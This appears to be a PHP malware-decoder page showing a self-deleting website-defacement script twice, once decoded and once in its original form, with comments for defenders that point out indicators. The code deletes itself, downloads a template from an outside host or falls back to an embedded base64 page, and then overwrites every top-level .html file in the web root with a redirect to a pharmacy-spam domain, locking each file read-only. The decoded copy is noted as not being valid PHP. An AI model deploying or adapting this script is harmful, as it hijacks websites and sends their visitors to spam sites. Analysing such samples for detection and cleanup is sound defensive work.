PHP Decode
<?php unlink(__FILE__); @ignore_user_abort (true); set_time_limit ( 111000 ); $x..
Decoded Output download
<?php unlink(__FILE__);
// [analysis] Decoded view of a self-deleting defacement script, summarised for defenders.
// What the visible code does, in order:
//   1. The statement above removes this script from disk as soon as it runs, so the
//      file is normally absent afterwards; the request that triggered it remains
//      visible in web-server access logs.
//   2. It keeps running after the client disconnects and raises the time limit to
//      111000 seconds.
//   3. It downloads a page template over plain HTTP from the URL assigned to $ggg
//      below; if the result is shorter than 10000 bytes it falls back to the embedded
//      base64 blob, which decodes to a small HTML page ("You are not logged in!")
//      that redirects through a meta refresh tag and window.location.
//   4. The ##LINK_URL## placeholder is replaced with https://<entry from $x_domains>/
//      (the list holds a single domain here).
//   5. Every *.html file directly inside DOCUMENT_ROOT (not subdirectories) is made
//      writable, overwritten with that page twice (file_put_contents, then
//      fopen/fwrite), and set to mode 0444.
//   6. A one-line status string is echoed in the HTTP response. $server_domain and
//      $links_replaced are never assigned in this listing, and $files_changed is
//      never initialised before it is incremented.
// Triage hints grounded in the above: outbound HTTP from the web server to the
// template host, top-level .html files that are read-only with identical content,
// and a response body starting with "Domain =" and ending in "files".
// NOTE(review): this decoded rendering shows backslash escapes one level shallower
// than the Original Code section (the Windows-separator branch and the basename
// regex), so this copy is not valid PHP as displayed; treat the Original Code
// section as the authoritative text.
@ignore_user_abort (true);
set_time_limit ( 111000 );
$x_domains = explode(',' , "alldrugmall.com");
$ggg = file_get_contents('http://bizmatebd.com/zqmarkets.txt');
//$ggg = '';
//$ggg = '';
if (strlen($ggg) < 10000 )
{
//$x_domains = explode(',' , "cheapmedplace.com");
$ggg = base64_decode("PGh0bWw+DQogICAgPGhlYWQ+DQogICAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KICAgICAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO3VybD0jI0xJTktfVVJMIyMiIC8+DQogICAgPC9oZWFkPg0KDQogICAgPGJvZHk+DQogICAgICAgIDxwPllvdSBhcmUgbm90IGxvZ2dlZCBpbiE8L3A+DQogICAgICAgIDxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uID0gIiMjTElOS19VUkwjIyI7DQogICAgICAgIDwvc2NyaXB0Pg0KICAgIDwvYm9keT4NCjwvaHRtbD4NCg==");
}
//$ggg = base64_encode(str_replace( '##LINK_URL##', base64_encode('http://' . $x_domains[array_rand($x_domains)] . '/') , $ggg ));
//$ggg = base64_encode(str_replace( '##LINK_URL##', 'http://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
$ggg = base64_encode(str_replace( '##LINK_URL##', 'https://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
//echo $ggg;
$root = $_SERVER["DOCUMENT_ROOT"];
if (strpos($root,'/') !== false) {
$path = $root . "/";
}
else $path = $root . "\";
//echo $path . PHP_EOL;
$root = $path;
$shell_url = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] ;
foreach(glob($root . '/*.html') as $fname) {
// echo $fname . PHP_EOL;
$files_changed++;
//echo 'INDEX.PHP PATCHED--1111111' . PHP_EOL;
$filepath=$fname;
$basename = preg_replace('/^.+[\\\/]/', '', $filepath);
//echo $basename;
chmod($fname, 0644);
file_put_contents($fname, base64_decode($ggg));
$fp = fopen($fname , 'w');
fwrite($fp, base64_decode($ggg));
fclose($fp);
chmod($fname, 0444);
//echo file_get_contents($fname);
//echo $shell_url . '/' . $basename . PHP_EOL ;
//break;
}
//echo 'Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
echo 'Domain = ' . $server_domain . ' Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
?>
Original Code
<?php unlink(__FILE__);
// [analysis] Self-deleting defacement script, annotated for defenders.
// The statement above deletes this script from disk as soon as it starts, so the
// file is usually gone by the time anyone investigates; the rest of the script
// still runs. Web-server access logs are then the main record of the request.

// Keep running after the HTTP client disconnects and raise the execution limit
// to 111000 seconds.
@ignore_user_abort (true);
set_time_limit ( 111000 );
// Redirect destinations: a comma-separated list that holds a single domain here.
$x_domains = explode(',' , "alldrugmall.com");
// Fetch the replacement page template from a remote host over plain HTTP.
// An outbound request from the web server to this URL is a network indicator.
$ggg = file_get_contents('http://bizmatebd.com/zqmarkets.txt');
//$ggg = '';
//$ggg = '';
// Fallback: a failed download or a body shorter than 10000 bytes switches to the
// embedded template below.
if (strlen($ggg) < 10000 )
{
//$x_domains = explode(',' , "cheapmedplace.com");
// The blob decodes to a minimal HTML page reading "You are not logged in!" that
// redirects to the ##LINK_URL## placeholder through both a meta refresh tag and
// a window.location assignment.
$ggg = base64_decode("PGh0bWw+DQogICAgPGhlYWQ+DQogICAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KICAgICAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO3VybD0jI0xJTktfVVJMIyMiIC8+DQogICAgPC9oZWFkPg0KDQogICAgPGJvZHk+DQogICAgICAgIDxwPllvdSBhcmUgbm90IGxvZ2dlZCBpbiE8L3A+DQogICAgICAgIDxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uID0gIiMjTElOS19VUkwjIyI7DQogICAgICAgIDwvc2NyaXB0Pg0KICAgIDwvYm9keT4NCjwvaHRtbD4NCg==");
}
//$ggg = base64_encode(str_replace( '##LINK_URL##', base64_encode('http://' . $x_domains[array_rand($x_domains)] . '/') , $ggg ));
//$ggg = base64_encode(str_replace( '##LINK_URL##', 'http://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
// Fill the placeholder with https://<randomly picked list entry>/ and base64-encode
// the page. It is decoded again before every write, so the round trip does not
// change the bytes that end up on disk.
$ggg = base64_encode(str_replace( '##LINK_URL##', 'https://' . $x_domains[array_rand($x_domains)] . '/' , $ggg ));
//echo $ggg;
// Build the target directory from the document root, appending "/" when the path
// contains a forward slash and a backslash otherwise.
$root = $_SERVER["DOCUMENT_ROOT"];
if (strpos($root,'/') !== false) {
$path = $root . "/";
}
else $path = $root . "\\";
//echo $path . PHP_EOL;
$root = $path;
// $shell_url is only referenced by commented-out debug output further down.
$shell_url = ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] ;
// Targets every *.html file directly inside the document root; this pattern does
// not descend into subdirectories.
foreach(glob($root . '/*.html') as $fname) {
// echo $fname . PHP_EOL;
// $files_changed is never initialised in this listing before being incremented.
$files_changed++;
//echo 'INDEX.PHP PATCHED--1111111' . PHP_EOL;
$filepath=$fname;
// Strips everything up to the last slash or backslash; $basename is only used by
// commented-out debug output.
$basename = preg_replace('/^.+[\\\\\\/]/', '', $filepath);
//echo $basename;
// Make the file writable, overwrite it with the redirect page (written twice: once
// with file_put_contents, again with fopen/fwrite), then set it read-only.
// Cleanup hint: top-level .html files with mode 0444 and identical content are
// candidates for restoring from a known-good backup.
chmod($fname, 0644);
file_put_contents($fname, base64_decode($ggg));
$fp = fopen($fname , 'w');
fwrite($fp, base64_decode($ggg));
fclose($fp);
chmod($fname, 0444);
//echo file_get_contents($fname);
//echo $shell_url . '/' . $basename . PHP_EOL ;
//break;
}
//echo 'Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
// Status line returned in the HTTP response. $server_domain and $links_replaced are
// never assigned in this listing, so they print as empty strings; a response body
// that starts with "Domain =" and ends with "files" is a usable detection string.
echo 'Domain = ' . $server_domain . ' Files = ' . $files_changed . ' Links changed in ' . $links_replaced . ' files';
Function Calls
unlink | 1 |
Stats
MD5 | 63d4c790ccc73a011213a10e54576d05 |
Eval Count | 0 |
Decode Time | 86 ms |